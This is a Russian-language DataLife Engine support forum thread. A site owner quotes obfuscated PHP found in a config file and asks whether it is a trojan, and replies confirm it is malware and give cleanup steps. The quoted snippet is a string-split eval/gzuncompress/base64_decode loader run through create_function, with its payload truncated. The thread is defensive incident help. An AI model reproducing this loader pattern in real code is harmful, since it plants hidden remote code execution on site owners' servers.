GizmoN 0 Опубликовано: вчера в 06:57 Рассказать Опубликовано: вчера в 06:57 Всем привет, сегодня на рег ру выдали уведомление о вредоносе в файлах скрипта, в частности вот на это engine/data/config.php $dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6VVftv2zYQ...')));"; $lic_true = "cre"."ate_"."function"; if(@function_exists($lic_true)) { @$dle_conf = $lic_true('', "$dle_lic;"); $dle_conf(''); } Скажите это легальный код или все таки троян? Лицензия был куплена по акции 2 по цене одной, но давно не обновлял Цитата Ссылка на сообщение Поделиться на других сайтах
alex32 943 Опубликовано: вчера в 08:08 Рассказать Опубликовано: вчера в 08:08 1 час назад, GizmoN сказал: в частности вот на это engine/data/config.php в этом файле такого кода точно нет. в нем только массив с настройками хранится. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 168 Опубликовано: вчера в 08:12 Рассказать Опубликовано: вчера в 08:12 1 час назад, GizmoN сказал: кажите это легальный код или все таки троян? Лицензия был куплена по акции 2 по цене одной, но давно не обновлял Нет. Это не легальный код. К лицензии не имеет и не может иметь никакого отношения. Это точно вредоносный код, полученный вами из вне. Вам нужно менять все пароли. Как к своему аккаунту на сайте в DLE, так и другие непосредственно к серверу, базе данных, по FTP, хостингу и т.д. то есть все. А также проверить сайт на наличие шеллов. Для удаления на сервере со стороны DLE нужно сделать следующее: 1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива. 2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/ 3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения, антивирус проверяет все папки если нажать на "Провести тщательное сканирование". Удалять нужно все, на что он указывает. 4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения. 5. Изменить все пароли, как к хостингу, так и к DLE. 6. Удалить в админпанели всех администраторов кроме себя. 7. Проверьте все свои файлы шаблона, удалите все неизвестные и посторонние JS скрипты, рекламные коды и скрипты. 8. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения. Со стороны сервера: Полностью обновить все серверное ПО и сменить все без исключения пароли. Изучение логов сервера, на предмет кто с каких IP заходил на шелл на сервере, что делал до этого на сервере и куда заходил. Какая активность была перед появлением шелла на сервере в принципе. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.